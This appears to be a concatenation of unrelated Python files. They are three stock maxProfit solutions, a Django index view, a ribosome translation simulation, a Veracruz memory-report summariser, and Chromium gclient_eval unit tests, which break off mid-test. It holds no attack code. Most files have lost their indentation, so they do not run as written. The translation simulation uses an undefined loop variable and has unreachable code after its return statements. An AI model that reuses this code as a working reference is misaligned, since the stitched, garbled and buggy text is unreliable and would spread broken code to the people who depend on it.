from typing import List


class Solution:
def maxProfit(self, prices: List[int]) -> int:
min_p = 10**5 + 1
max_p = 0
cnt = 0
for p in prices:
if p > max_p:
max_p = p
if p < min_p:
min_p = p
max_p = 0
diff = max_p - min_p
if cnt < diff:
cnt = diff
return cnt
class Solution:
def maxProfit(self, prices: List[int]) -> int:
p_min = prices[0]
p_return = 0
for price in prices:
if price < p_min:
p_min = price
else:
p_return = max(p_return, price - p_min)
return p_return
class Solution:
def maxProfit(self, prices: List[int]) -> int:
max_profit = 0
first = float("inf")
for num in prices:
if first > num:
first = num
else:
diff = num - first
if diff > max_profit:
max_profit = diff
return max_profit
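# A quick sanity check of the solutions above on a small, assumed example input
# (not part of the original submissions): for [7, 1, 5, 3, 6, 4] the best trade is
# buy at 1 and sell at 6, so the expected answer is 5.
if __name__ == "__main__":
    sample_prices = [7, 1, 5, 3, 6, 4]
    print(Solution().maxProfit(sample_prices))  # expected: 5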
|
from django.shortcuts import render
# Create your views here.
def index(request):
template_name = "reactify/index.html"
return render(request, template_name)
|
import processes
import random
import database
from molecules import Ribo, Protein, MRNA, PopulationCollection, ParticleCollection
class Translation(processes.Process):
"""
    Translation is instantiated in the Cell to produce proteins.
    It iterates over all ribosomes and decides what they should do: they either
    bind to an mRNA or elongate/terminate a protein if they are already bound.
"""
def __init__(self, name, model):
# call the constructor of the base class (processes.Process in this case)
super().__init__(name, model)
def __str__(self):
# return string output of translation process
# todo: each process class should define this
return "Translation process for mRNAs: {}".format(list(self.model.states['mRNA']))
def update(self):
"""
        Update all mRNAs and translate proteins.
"""
for mrna_id in self.model.states[MRNA].molecules:
for mrna in self.model.states[MRNA].molecules[mrna_id]:
#self.initiate(mrna)
self.elongate(mrna)
def initiate(self, mrna):
"""
Try to bind to a given MRNA. Binding probability corresponds to the ribosome count.
        @type mrna: MRNA
        """
        # disabled: earlier single-ribosome binding logic, kept for reference
        # if not bound already and if ribosomes available
        # if mrna.bindings == [] and self.model.states[Ribo].molecules['free ribos'] > 0:
        #     mrna.bindings.append('ribo')
        #     self.model.states[Ribo].take('free ribos')
        #     self.model.states[Ribo].add(Ribo('bound ribos'))
#mrna.bindings = ([[0,0,[]]]*len(mrna.sequence))
for ooo in range(int(len(mrna.sequence)/3)):
mrna.bindings.append([0,0,[]])
#print(mrna.sequence)
#print(len(mrna.sequence))
for posi in range((len(mrna.bindings))-2):
if mrna.sequence[posi] == 'A':
if mrna.sequence[posi +1] == 'U':
if mrna.sequence[posi +2] == 'G':
mrna.bindings[posi][0] = 1
break
elif mrna.sequence[posi] == 'G':
if mrna.sequence[posi +1] == 'U':
if mrna.sequence[posi +2] == 'G':
mrna.bindings[posi][0] = 1
break
elif mrna.sequence[posi] == 'U':
if mrna.sequence[posi +1] == 'U':
if mrna.sequence[posi +2] == 'G':
mrna.bindings[posi][0] = 1
break
#print(mrna.bindings)
def elongate(self, mrna):
"""
Elongate the new protein by the correct amino acid. Check if an
MRNA is bound and if ribosome can move to next codon.
        Terminate if the ribosome reaches a STOP codon.
        """
        # disabled: earlier one-pass elongation logic, kept for reference
        # if 'ribo' in mrna.bindings:
        #     prot = Protein(mrna.name.lower().capitalize())  # protein names are like mRNA names, but only capitalized
        #     for i in range(int(len(mrna.sequence) / 3)):  # go through codons
        #         codon = mrna.sequence[i:i + 3]
        #         amino_acid = database.ModelData.codon_to_amino_acid[codon]
        #         if amino_acid != '*':  # if STOP codon
        #             prot.add_monomer(amino_acid)
        #         else:
        #             self.model.states[Protein].add(prot)
        #             mrna.bindings.remove('ribo')
        #             self.model.states[Ribo].take('bound ribos')
        #             self.model.states[Ribo].add(Ribo('free ribos'))
        #             return prot
for _ in range(10):
            # bind ribosomes:
#print(mrna.bindings)
for pos in range((len(mrna.bindings))):
                if mrna.bindings[pos][0] == 1:  # if pos is a start position
                    # occupy 50% of the start sites with ribosomes
#print(self.model.states[Ribo].molecules['free ribos'])
if mrna.bindings[pos][1]==0:
bindungsw=self.model.states[Ribo].molecules['free ribos']/(self.model.states[Ribo].count())
#print(bindungsw)
if random.random() < 1:#bindungsw:
if self.model.states[Ribo].molecules['free ribos'] > 0:
mrna.bindings[pos][1] = 1
self.model.states[Ribo].take('free ribos')
self.model.states[Ribo].add(Ribo('bound ribos'))
#print(self.model.states[Ribo].molecules['free ribos']+self.model.states[Ribo].molecules['bound ribos'])
print(mrna.bindings)
            # in case the ribosome has reached the end and there is no STOP codon
if mrna.bindings[len(mrna.bindings)-1][1] == 1:
print('a')
                # remove the old ribosome position
mrna.bindings[len(mrna.bindings)-1][1] = 0
                # free the ribosome
self.model.states[Ribo].take('bound ribos')
self.model.states[Ribo].add(Ribo('free ribos'))
                # extend the old sequence with the stop base
print(len(mrna.bindings)*3-3)
print(len(mrna.sequence))
AS=database.ModelData.codon_to_amino_acid[mrna.sequence[len(mrna.bindings)*3-3:len(mrna.bindings)*3]]
mrna.bindings[len(mrna.bindings)-1][2].append(AS)
prot = Protein(mrna.name.lower().capitalize())
self.model.states[ Protein ].add(prot)
return prot
                # remove the new ribosome position
mrna.bindings[basenposi+1][1] = 0
                # remove the sequence
mrna.bindings[basenposi+1][2] = []
                # disabled: build the protein from the collected sequence, kept for reference
                # for i in range(int(len(mrna.bindings[len(mrna.bindings)-1][2]) / 3)):  # go through codons
                #     codon = mrna.sequence[i * 3:i * 3 + 3]
                #     amino_acid = database.ModelData.codon_to_amino_acid[codon]
                #     prot = Protein(mrna.name.lower().capitalize())  # protein names are like mRNA names, but only capitalized
                #     if amino_acid != '*':  # if STOP codon
                #         prot.add_monomer(amino_acid)
                #     else:
                #         self.model.states[Protein].add(prot)
                #         mrna.bindings.remove('ribo')
                #         self.model.states[Ribo].take('bound ribos')
                #         self.model.states[Ribo].add(Ribo('free ribos'))
                #         return prot
                # delete the old sequence part from the old position
                # mrna.bindings[len(mrna.bindings)-1][2] = []
            # movement step: advance each bound ribosome by one codon
            for basenposi in range(len(mrna.bindings) - 2, -1, -1):  # walk from the second-to-last entry down to the first
#print (basenposi)
                if mrna.bindings[basenposi][1] == 1:  # if a ribosome is bound here
                    # remove the old ribosome position
mrna.bindings[basenposi][1] = 0
                    # set the new ribosome position
mrna.bindings[basenposi+1][1] = 1
                    # copy the old sequence part into the new position
mrna.bindings[basenposi+1][2] = (mrna.bindings[basenposi][2]).copy()
                    # delete the old sequence part from the old position
mrna.bindings[basenposi][2]=[]
                    # extend the sequence at the new position with the preceding base if there is no stop sequence
AS=database.ModelData.codon_to_amino_acid[mrna.sequence[basenposi*3:basenposi*3+3]]
#print(mrna.sequence[basenposi*3:basenposi*3+3])
if AS != '*': # if STOP codon
mrna.bindings[basenposi+1][2].append(AS)
else:
prot = Protein(mrna.name.lower().capitalize())
self.model.states[ Protein ].add(prot)
self.model.states[ Ribo ].take('bound ribos')
self.model.states[ Ribo ].add(Ribo('free ribos'))
return prot
                # remove the new ribosome position
mrna.bindings[basenposi+1][1] = 0
                # remove the sequence
mrna.bindings[basenposi+1][2] = []
def terminate(self, mrna):
"""
Splits the ribosome/MRNA complex and returns a protein.
"""
pass
|
#!/usr/bin/env python3
#
# Summarize breakdown of rom/ram in memory reports
#
# ## Authors
#
# The Veracruz Development Team.
#
# ## Licensing and copyright notice
#
# See the `LICENSE_MIT.markdown` file in the Veracruz root directory for
# information on licensing and copyright.
#
import argparse
import collections as co
import itertools as it
import re
import sys
# note: order matters here; earlier groups are matched first, so they
# should be more specific
GROUPS = [
('nanopb', ['Tp', 'nanopb']),
('policy', ['policy.c']),
('base64', ['base64']),
('mbedtls', ['mbedtls']),
('net', ['net']),
('vc', ['vc']),
('main', ['samples']),
('zephyr', ['zephyr', 'kernel', 'os', 'drivers', 'arch']),
]
# parse static reports for group-level memory usage
def find_static_groups(report_path):
with open(report_path, encoding="utf-8") as report:
# skip lines before ====
for line in report:
if re.match('^=+$', line):
break
scope = []
groups = co.defaultdict(lambda: 0)
total = 0
# build up paths in ROM report
for line in report:
# skip lines after ====
if re.match('^=+$', line):
# last line should contain total
total = int(next(report))
break
m = re.match('^([ ├└──│]*)([^ ]+) +([0-9]+)', line)
if not m:
continue
depth = len(m.group(1))
name = m.group(2)
size = int(m.group(3))
# remove prev from scope?
while len(scope) > 0 and scope[-1][0] >= depth:
pdepth, pname, psize = scope.pop()
if psize > 0:
pfullname = '/'.join(it.chain(
(ppname for _, ppname, _ in scope),
[pname]))
for group, patterns in GROUPS:
if any(pattern in pfullname for pattern in patterns):
groups[group] += psize
break
else:
groups['misc'] += psize
# remove size from parents?
for i in range(len(scope)):
ppdepth, ppname, ppsize = scope[i]
scope[i] = (ppdepth, ppname, ppsize - psize)
# add to scope?
scope.append((depth, name, size))
return groups, total
# parse dynamic reports for group-level memory usage
def find_dyn_groups(report_path):
with open(report_path) as report:
# first we should find the peak index
peak = 0
for line in report:
m = re.search('([0-9]+) \(peak\)', line)
if m:
peak = int(m.group(1))
break
# now find the peak
for line in report:
m = re.match('^ +([0-9]+) +[0-9,]+ +([0-9,]+) +[0-9,]+ +[0-9,]+ +([0-9,]+)', line)
if m:
n = int(m.group(1))
if n == peak:
heap_total = int(m.group(2).replace(',', ''))
stack_total = int(m.group(3).replace(',', ''))
break
# following this is more details, parse
heap_groups = co.defaultdict(lambda: 0)
size = 0
nested_lines = []
for line in report:
if re.match('->', line):
# add previous parse
if size > 0:
for group, patterns in GROUPS:
if any(pattern in nested_line
for pattern in patterns
for nested_line in nested_lines):
heap_groups[group] += size
break
else:
heap_groups['misc'] += size
# start next parse
m = re.search('\(([0-9,]+)B\)', line)
size = int(m.group(1).replace(',', ''))
nested_lines = [line]
elif re.match('[ |]*->', line):
nested_lines.append(line)
# we can't find stack this way
stack_groups = co.defaultdict(lambda: 0)
stack_groups['misc'] = stack_total
return (heap_groups, heap_total, stack_groups, stack_total)
def main(args):
# find groups
code_groups, code_total = find_static_groups(args.rom_report)
static_groups, static_total = find_static_groups(args.static_ram_report)
heap_groups, heap_total, stack_groups, stack_total = find_dyn_groups(args.dyn_ram_report)
print("%-12s %7s %7s %7s %7s" % ('', 'code', 'static', 'heap', 'stack'))
for group, _ in it.chain(sorted(GROUPS), [('misc', [])]):
print("%-12s %7d %7d %7d %7d" % (
group,
code_groups[group],
static_groups[group],
heap_groups[group],
stack_groups[group]))
print("%-12s %7d %7d %7d %7d" % (
'TOTAL',
code_total,
static_total,
heap_total,
stack_total))
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description='Summarize breakdown of rom/ram in memory reports')
parser.add_argument('rom_report',
help='ROM report output from Zephyr')
parser.add_argument('static_ram_report',
help='Static RAM report output from Zephyr')
parser.add_argument('dyn_ram_report',
        help='Dynamic RAM report output from Valgrind\'s Massif tool')
args = parser.parse_args()
main(args)
|
#!/usr/bin/env vpython3
# Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import collections
import itertools
import logging
import os
import sys
import unittest
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from third_party import schema
import metrics
# We have to disable monitoring before importing gclient.
metrics.DISABLE_METRICS_COLLECTION = True
import gclient
import gclient_eval
import gclient_utils
class GClientEvalTest(unittest.TestCase):
def test_str(self):
self.assertEqual('foo', gclient_eval._gclient_eval('"foo"'))
def test_tuple(self):
self.assertEqual(('a', 'b'), gclient_eval._gclient_eval('("a", "b")'))
def test_list(self):
self.assertEqual(['a', 'b'], gclient_eval._gclient_eval('["a", "b"]'))
def test_dict(self):
self.assertEqual({'a': 'b'}, gclient_eval._gclient_eval('{"a": "b"}'))
def test_name_safe(self):
self.assertEqual(True, gclient_eval._gclient_eval('True'))
def test_name_unsafe(self):
with self.assertRaises(ValueError) as cm:
gclient_eval._gclient_eval('UnsafeName')
self.assertIn('invalid name \'UnsafeName\'', str(cm.exception))
def test_invalid_call(self):
with self.assertRaises(ValueError) as cm:
gclient_eval._gclient_eval('Foo("bar")')
self.assertIn('Var is the only allowed function', str(cm.exception))
def test_expands_vars(self):
self.assertEqual(
'foo',
gclient_eval._gclient_eval('Var("bar")', vars_dict={'bar': 'foo'}))
def test_expands_vars_with_braces(self):
self.assertEqual(
'foo',
gclient_eval._gclient_eval('"{bar}"', vars_dict={'bar': 'foo'}))
def test_invalid_var(self):
with self.assertRaises(KeyError) as cm:
gclient_eval._gclient_eval('"{bar}"', vars_dict={})
self.assertIn('bar was used as a variable, but was not declared',
str(cm.exception))
def test_plus(self):
self.assertEqual('foo', gclient_eval._gclient_eval('"f" + "o" + "o"'))
def test_format(self):
self.assertEqual('foo', gclient_eval._gclient_eval('"%s" % "foo"'))
def test_not_expression(self):
with self.assertRaises(SyntaxError) as cm:
gclient_eval._gclient_eval('def foo():\n pass')
self.assertIn('invalid syntax', str(cm.exception))
def test_not_whitelisted(self):
with self.assertRaises(ValueError) as cm:
gclient_eval._gclient_eval('[x for x in [1, 2, 3]]')
self.assertIn(
'unexpected AST node: <_ast.ListComp object', str(cm.exception))
def test_dict_ordered(self):
for test_case in itertools.permutations(range(4)):
input_data = ['{'] + ['"%s": "%s",' % (n, n) for n in test_case] + ['}']
expected = [(str(n), str(n)) for n in test_case]
result = gclient_eval._gclient_eval(''.join(input_data))
self.assertEqual(expected, list(result.items()))
class ExecTest(unittest.TestCase):
def test_multiple_assignment(self):
with self.assertRaises(ValueError) as cm:
gclient_eval.Exec('a, b, c = "a", "b", "c"')
self.assertIn(
'invalid assignment: target should be a name', str(cm.exception))
def test_override(self):
with self.assertRaises(ValueError) as cm:
gclient_eval.Exec('a = "a"\na = "x"')
self.assertIn(
'invalid assignment: overrides var \'a\'', str(cm.exception))
def test_schema_wrong_type(self):
with self.assertRaises(gclient_utils.Error):
gclient_eval.Exec('include_rules = {}')
def test_recursedeps_list(self):
local_scope = gclient_eval.Exec(
'recursedeps = [["src/third_party/angle", "DEPS.chromium"]]')
self.assertEqual(
{'recursedeps': [['src/third_party/angle', 'DEPS.chromium']]},
local_scope)
def test_var(self):
local_scope = gclient_eval.Exec('\n'.join([
'vars = {',
' "foo": "bar",',
'}',
'deps = {',
' "a_dep": "a" + Var("foo") + "b",',
'}',
]))
self.assertEqual({
'vars': collections.OrderedDict([('foo', 'bar')]),
'deps': collections.OrderedDict([('a_dep', 'abarb')]),
}, local_scope)
def test_braces_var(self):
local_scope = gclient_eval.Exec('\n'.join([
'vars = {',
' "foo": "bar",',
'}',
'deps = {',
' "a_dep": "a{foo}b",',
'}',
]))
self.assertEqual({
'vars': collections.OrderedDict([('foo', 'bar')]),
'deps': collections.OrderedDict([('a_dep', 'abarb')]),
}, local_scope)
def test_empty_deps(self):
local_scope = gclient_eval.Exec('deps = {}')
self.assertEqual({'deps': {}}, local_scope)
def test_overrides_vars(self):
local_scope = gclient_eval.Exec('\n'.join([
'vars = {',
' "foo": "bar",',
'}',
'deps = {',
' "a_dep": "a{foo}b",',
'}',
]), vars_override={'foo': 'baz'})
self.assertEqual({
'vars': collections.OrderedDict([('foo', 'bar')]),
'deps': collections.OrderedDict([('a_dep', 'abazb')]),
}, local_scope)
def test_doesnt_override_undeclared_vars(self):
with self.assertRaises(KeyError) as cm:
gclient_eval.Exec('\n'.join([
'vars = {',
' "foo": "bar",',
'}',
'deps = {',
' "a_dep": "a{baz}b",',
'}',
]), vars_override={'baz': 'lalala'})
self.assertIn('baz was used as a variable, but was not declared',
str(cm.exception))
def test_doesnt_allow_duplicate_deps(self):
with self.assertRaises(ValueError) as cm:
gclient_eval.Parse('\n'.join([
'deps = {',
' "a_dep": {',
' "url": "a_url@a_rev",',
' "condition": "foo",',
' },',
' "a_dep": {',
' "url": "a_url@another_rev",',
' "condition": "not foo",',
' }',
'}',
]), '<unknown>')
self.assertIn('duplicate key in dictionary: a_dep', str(cm.exception))
class UpdateConditionTest(unittest.TestCase):
def test_both_present(self):
info = {'condition': 'foo'}
gclient_eval.UpdateCondition(info, 'and', 'bar')
self.assertEqual(info, {'condition': '(foo) and (bar)'})
info = {'condition': 'foo'}
gclient_eval.UpdateCondition(info, 'or', 'bar')
self.assertEqual(info, {'condition': '(foo) or (bar)'})
def test_one_present_and(self):
# If one of info's condition or new_condition is present, and |op| == 'and'
    # then the result must be the present condition.
info = {'condition': 'foo'}
gclient_eval.UpdateCondition(info, 'and', None)
self.assertEqual(info, {'condition': 'foo'})
info = {}
gclient_eval.UpdateCondition(info, 'and', 'bar')
self.assertEqual(info, {'condition': 'bar'})
def test_both_absent_and(self):
# Nothing happens
info = {}
gclient_eval.UpdateCondition(info, 'and', None)
self.assertEqual(info, {})
def test_or(self):
    # If either info's condition or new_condition is absent, the result should
    # have no condition at all, since an absent value is treated as implicitly True.
info = {'condition': 'foo'}
gclient_eval.UpdateCondition(info, 'or', None)
self.assertEqual(info, {})
info = {}
gclient_eval.UpdateCondition(info, 'or', 'bar')
self.assertEqual(info, {})
info = {}
gclient_eval.UpdateCondition(info, 'or', None)
self.assertEqual(info, {})
class EvaluateConditionTest(unittest.TestCase):
def test_true(self):
self.assertTrue(gclient_eval.EvaluateCondition('True', {}))
def test_variable(self):
self.assertFalse(gclient_eval.EvaluateCondition('foo', {'foo': 'False'}))
def test_variable_cyclic_reference(self):
with self.assertRaises(ValueError) as cm:
self.assertTrue(gclient_eval.EvaluateCondition('bar', {'bar': 'bar'}))
self.assertIn(
'invalid cyclic reference to \'bar\' (inside \'bar\')',
str(cm.exception))
def test_operators(self):
self.assertFalse(gclient_eval.EvaluateCondition(
'a and not (b or c)', {'a': 'True', 'b': 'False', 'c': 'True'}))
def test_expansion(self):
self.assertTrue(gclient_eval.EvaluateCondition(
'a or b', {'a': 'b and c', 'b': 'not c', 'c': 'False'}))
def test_string_equality(self):
self.assertTrue(gclient_eval.EvaluateCondition(
'foo == "baz"', {'foo': '"baz"'}))
self.assertFalse(gclient_eval.EvaluateCondition(
'foo == "bar"', {'foo': '"baz"'}))
def test_string_inequality(self):
self.assertTrue(gclient_eval.EvaluateCondition(
'foo != "bar"', {'foo': '"baz"'}))
self.assertFalse(gclient_eval.EvaluateCondition(
'foo != "baz"', {'foo': '"baz"'}))
def test_triple_or(self):
self.assertTrue(gclient_eval.EvaluateCondition(
'a or b or c', {'a': 'False', 'b': 'False', 'c': 'True'}))
self.assertFalse(gclient_eval.EvaluateCondition(
'a or b or c', {'a': 'False', 'b': 'False', 'c': 'False'}))
def test_triple_and(self):
self.assertTrue(gclient_eval.EvaluateCondition(
'a and b and c', {'a': 'True', 'b': 'True', 'c': 'True'}))
self.assertFalse(gclient_eval.EvaluateCondition(
'a and b and c', {'a': 'True', 'b': 'True', 'c': 'False'}))
def test_triple_and_and_or(self):
self.assertTrue(gclient_eval.EvaluateCondition(
'a and b and c or d or e',
{'a': 'False', 'b': 'False', 'c': 'False', 'd': 'False', 'e': 'True'}))
self.assertFalse(gclient_eval.EvaluateCondition(
'a and b and c or d or e',
{'a': 'True', 'b': 'True', 'c': 'False', 'd': 'False', 'e': 'False'}))
def test_string_bool(self):
self.assertFalse(gclient_eval.EvaluateCondition(
'false_str_var and true_var',
{'false_str_var': 'False', 'true_var': True}))
def test_string_bool_typo(self):
with self.assertRaises(ValueError) as cm:
gclient_eval.EvaluateCondition(
'false_var_str and true_var',
{'false_str_var': 'False', 'true_var': True})
self.assertIn(
'invalid "and" operand \'false_var_str\' '
'(inside \'false_var_str and true_var\')',
str(cm.exception))
def test_non_bool_in_or(self):
with self.assertRaises(ValueError) as cm:
gclient_eval.EvaluateCondition(
'string_var or true_var',
{'string_var': 'Kittens', 'true_var': True})
self.assertIn(
'invalid "or" operand \'Kittens\' '
'(inside \'string_var or true_var\')',
str(cm.exception))
def test_non_bool_in_and(self):
with self.assertRaises(ValueError) as cm:
gclient_eval.EvaluateCondition(
'string_var and true_var',
{'string_var': 'Kittens', 'true_var': True})
self.assertIn(
'invalid "and" operand \'Kittens\' '
'(inside \'string_var and true_var\')',
str(cm.exception))
def test_tuple_presence(self):
self.assertTrue(gclient_eval.EvaluateCondition(
'foo in ("bar", "baz")', {'foo': 'bar'}))
self.assertFalse(gclient_eval.EvaluateCondition(
'foo in ("bar", "baz")', {'foo': 'not_bar'}))
def test_unsupported_tuple_operation(self):
with self.assertRaises(ValueError) as cm:
gclient_eval.EvaluateCondition('foo == ("bar", "baz")', {'foo': 'bar'})
self.assertIn('unexpected AST node', str(cm.exception))
with self.assertRaises(ValueError) as cm:
gclient_eval.EvaluateCondition('(foo,) == "bar"', {'foo': 'bar'})
self.assertIn('unexpected AST node', str(cm.exception))
class VarTest(unittest.TestCase):
def assert_adds_var(self, before, after):
local_scope = gclient_eval.Exec('\n'.join(before))
gclient_eval.AddVar(local_scope, 'baz', 'lemur')
results = gclient_eval.RenderDEPSFile(local_scope)
self.assertEqual(results, '\n'.join(after))
def test_adds_var(self):
before = [
'vars = {',
' "foo": "bar",',
'}',
]
after = [
'vars = {',
' "baz": "lemur",',
' "foo": "bar",',
'}',
]
self.assert_adds_var(before, after)
def test_adds_var_twice(self):
local_scope = gclient_eval.Exec('\n'.join([
'vars = {',
' "foo": "bar",',
'}',
]))
gclient_eval.AddVar(local_scope, 'baz', 'lemur')
gclient_eval.AddVar(local_scope, 'v8_revision', 'deadbeef')
result = gclient_eval.RenderDEPSFile(local_scope)
self.assertEqual(result, '\n'.join([
'vars = {',
' "v8_revision": "deadbeef",',
' "baz": "lemur",',
' "foo": "bar",',
'}',
]))
def test_gets_and_sets_var(self):
local_scope = gclient_eval.Exec('\n'.join([
'vars = {',
' "foo": "bar",',
'}',
]))
result = gclient_eval.GetVar(local_scope, 'foo')
self.assertEqual(result, "bar")
gclient_eval.SetVar(local_scope, 'foo', 'baz')
result = gclient_eval.RenderDEPSFile(local_scope)
self.assertEqual(result, '\n'.join([
'vars = {',
' "foo": "baz",',
'}',
]))
def test_gets_and_sets_var_non_string(self):
local_scope = gclient_eval.Exec('\n'.join([
'vars = {',
' "foo": True,',
'}',
]))
result = gclient_eval.GetVar(local_scope, 'foo')
self.assertEqual(result, True)
gclient_eval.SetVar(local_scope, 'foo', 'False')
result = gclient_eval.RenderDEPSFile(local_scope)
self.assertEqual(result, '\n'.join([
'vars = {',
' "foo": False,',
'}',
]))
def test_add_preserves_formatting(self):
before = [
'# Copyright stuff',
'# some initial comments',
'',
'vars = { ',
' # Some comments.',
' "foo": "bar",',
'',
' # More comments.',
' # Even more comments.',
' "v8_revision": ',
' "deadbeef",',
' # Someone formatted this wrong',
'}',
]
after = [
'# Copyright stuff',
'# some initial comments',
'',
'vars = { ',
' "baz": "lemur",',
' # Some comments.',
' "foo": "bar",',
'',
' # More comments.',
' # Even more comments.',
' "v8_revision": ',
' "deadbeef",',
' # Someone formatted this wrong',
'}',
]
self.assert_adds_var(before, after)
def test_set_preserves_formatting(self):
local_scope = gclient_eval.Exec('\n'.join([
'vars = {',
' # Comment with trailing space ',
' "foo": \'bar\',',
'}',
]))
gclient_eval.SetVar(local_scope, 'foo', 'baz')
result = gclient_eval.RenderDEPSFile(local_scope)
self.assertEqual(result, '\n'.join([
'vars = {',
' # Comment with trailing space ',
' "foo": \'baz\',',
'}',
]))
class CipdTest(unittest.TestCase):
def test_gets_and_sets_cipd(self):
local_scope = gclient_eval.Exec('\n'.join([
'deps = {',
' "src/cipd/package": {',
' "packages": [',
' {',
' "package": "some/cipd/package",',
' "version": "deadbeef",',
' },',
' {',
' "package": "another/cipd/package",',
' "version": "version:5678",',
' },',
' ],',
' "condition": "checkout_android",',
' "dep_type": "cipd",',
' },',
'}',
]))
self.assertEqual(
gclient_eval.GetCIPD(
local_scope, 'src/cipd/package', 'some/cipd/package'),
'deadbeef')
self.assertEqual(
gclient_eval.GetCIPD(
local_scope, 'src/cipd/package', 'another/cipd/package'),
'version:5678')
gclient_eval.SetCIPD(
local_scope, 'src/cipd/package', 'another/cipd/package', 'version:6789')
gclient_eval.SetCIPD(
local_scope, 'src/cipd/package', 'some/cipd/package', 'foobar')
result = gclient_eval.RenderDEPSFile(local_scope)
self.assertEqual(result, '\n'.join([
'deps = {',
' "src/cipd/package": {',
' "packages": [',
' {',
' "package": "some/cipd/package",',
' "version": "foobar",',
' },',
' {',
' "package": "another/cipd/package",',
' "version": "version:6789",',
' },',
' ],',
' "condition": "checkout_android",',
' "dep_type": "cipd",',
' },',
'}',
]))
def test_gets_and_sets_cipd_vars(self):
local_scope = gclient_eval.Exec('\n'.join([
'vars = {',
' "cipd-rev": "git_revision:deadbeef",',
' "another-cipd-rev": "version:1.0.3",',
'}',
'deps = {',
' "src/cipd/package": {',
' "packages": [',
' {',
' "package": "some/cipd/package",',
' "version": Var("cipd-rev"),',
' },',
' {',
' "package": "another/cipd/package",',
' "version": "{another-cipd-rev}",',
' },',
' ],',
' "condition": "checkout_android",',
' "dep_type": "cipd",',
' },',
'}',
]))
self.assertEqual(
gclient_eval.GetCIPD(
local_scope, 'src/cipd/package', 'some/cipd/package'),
'git_revision:deadbeef')
self.assertEqual(
gclient_eval.GetCIPD(
local_scope, 'src/cipd/package', 'another/cipd/package'),
'version:1.0.3')
gclient_eval.SetCIPD(
local_scope, 'src/cipd/package', 'another/cipd/package',
'version:1.1.0')
gclient_eval.SetCIPD(
local_scope, 'src/cipd/package', 'some/cipd/package',
'git_revision:foobar')
result = gclient_eval.RenderDEPSFile(local_scope)
self.assertEqual(result, '\n'.join([
'vars = {',
' "cipd-rev": "git_revision:foobar",',
' "another-cipd-rev": "version:1.1.0",',
'}',
'deps = {',
' "src/cipd/package": {',
' "packages": [',
' {',
' "package": "some/cipd/package",',
' "version": Var("cipd-rev"),',
' },',
' {',
' "package": "another/cipd/package",',
' "version": "{another-cipd-rev}",',
' },',
' ],',
' "condition": "checkout_android",',
' "dep_type": "cipd",',
' },',
'}',
]))
def test_preserves_escaped_vars(self):
local_scope = gclient_eval.Exec('\n'.join([
'deps = {',
' "src/cipd/package": {',
' "packages": [',
' {',
' "package": "package/${{platform}}",',
' "version": "version:abcd",',
' },',
' ],',
' "dep_type": "cipd",',
' },',
'}',
]))
gclient_eval.SetCIPD(
local_scope, 'src/cipd/package', 'package/${platform}', 'version:dcba')
result = gclient_eval.RenderDEPSFile(local_scope)
self.assertEqual(result, '\n'.join([
'deps = {',
' "src/cipd/package": {',
' "packages": [',
' {',
' "package": "package/${{platform}}",',
' "version": "version:dcba",',
' },',
' ],',
' "dep_type": "cipd",',
' },',
'}',
]))
class RevisionTest(unittest.TestCase):
def assert_gets_and_sets_revision(self, before, after, rev_before='deadbeef'):
local_scope = gclient_eval.Exec('\n'.join(before))
result = gclient_eval.GetRevision(local_scope, 'src/dep')
self.assertEqual(result, rev_before)
gclient_eval.SetRevision(local_scope, 'src/dep', 'deadfeed')
self.assertEqual('\n'.join(after), gclient_eval.RenderDEPSFile(local_scope))
def test_revision(self):
before = [
'deps = {',
' "src/dep": "https://example.com/dep.git@deadbeef",',
'}',
]
after = [
'deps = {',
' "src/dep": "https://example.com/dep.git@deadfeed",',
'}',
]
self.assert_gets_and_sets_revision(before, after)
def test_revision_new_line(self):
before = [
'deps = {',
' "src/dep": "https://example.com/dep.git@"',
' + "deadbeef",',
'}',
]
after = [
'deps = {',
' "src/dep": "https://example.com/dep.git@"',
' + "deadfeed",',
'}',
]
self.assert_gets_and_sets_revision(before, after)
def test_revision_inside_dict(self):
before = [
'deps = {',
' "src/dep": {',
' "url": "https://example.com/dep.git@deadbeef",',
' "condition": "some_condition",',
' },',
'}',
]
after = [
'deps = {',
' "src/dep": {',
' "url": "https://example.com/dep.git@deadfeed",',
' "condition": "some_condition",',
' },',
'}',
]
self.assert_gets_and_sets_revision(before, after)
def test_follows_var_braces(self):
before = [
'vars = {',
' "dep_revision": "deadbeef",',
'}',
'deps = {',
' "src/dep": "https://example.com/dep.git@{dep_revision}",',
'}',
]
after = [
'vars = {',
' "dep_revision": "deadfeed",',
'}',
'deps = {',
' "src/dep": "https://example.com/dep.git@{dep_revision}",',
'}',
]
self.assert_gets_and_sets_revision(before, after)
def test_follows_var_braces_newline(self):
before = [
'vars = {',
' "dep_revision": "deadbeef",',
'}',
'deps = {',
' "src/dep": "https://example.com/dep.git"',
' + "@{dep_revision}",',
'}',
]
after = [
'vars = {',
' "dep_revision": "deadfeed",',
'}',
'deps = {',
' "src/dep": "https://example.com/dep.git"',
' + "@{dep_revision}",',
'}',
]
self.assert_gets_and_sets_revision(before, after)
def test_follows_var_function(self):
before = [
'vars = {',
' "dep_revision": "deadbeef",',
'}',
'deps = {',
' "src/dep": "https://example.com/dep.git@" + Var("dep_revision"),',
'}',
]
after = [
'vars = {',
' "dep_revision": "deadfeed",',
'}',
'deps = {',
' "src/dep": "https://example.com/dep.git@" + Var("dep_revision"),',
'}',
]
self.assert_gets_and_sets_revision(before, after)
def test_pins_revision(self):
before = [
'deps = {',
' "src/dep": "https://example.com/dep.git",',
'}',
]
after = [
'deps = {',
' "src/dep": "https://example.com/dep.git@deadfeed",',
'}',
]
self.assert_gets_and_sets_revision(before, after, rev_before=None)
def test_preserves_variables(self):
before = [
'vars = {',
' "src_root": "src"',
'}',
'deps = {',
' "{src_root}/dep": "https://example.com/dep.git@deadbeef",',
'}',
]
after = [
'vars = {',
' "src_root": "src"',
'}',
'deps = {',
' "{src_root}/dep": "https://example.com/dep.git@deadfeed",',
'}',
]
self.assert_gets_and_sets_revision(before, after)
def test_preserves_formatting(self):
before = [
'vars = {',
' # Some coment on deadbeef ',
' "dep_revision": "deadbeef",',
'}',
'deps = {',
' "src/dep": {',
' "url": "https://example.com/dep.git@" + Var("dep_revision"),',
'',
' "condition": "some_condition",',
' },',
'}',
]
after = [
'vars = {',
' # Some coment on deadbeef ',
' "dep_revision": "deadfeed",',
'}',
'deps = {',
' "src/dep": {',
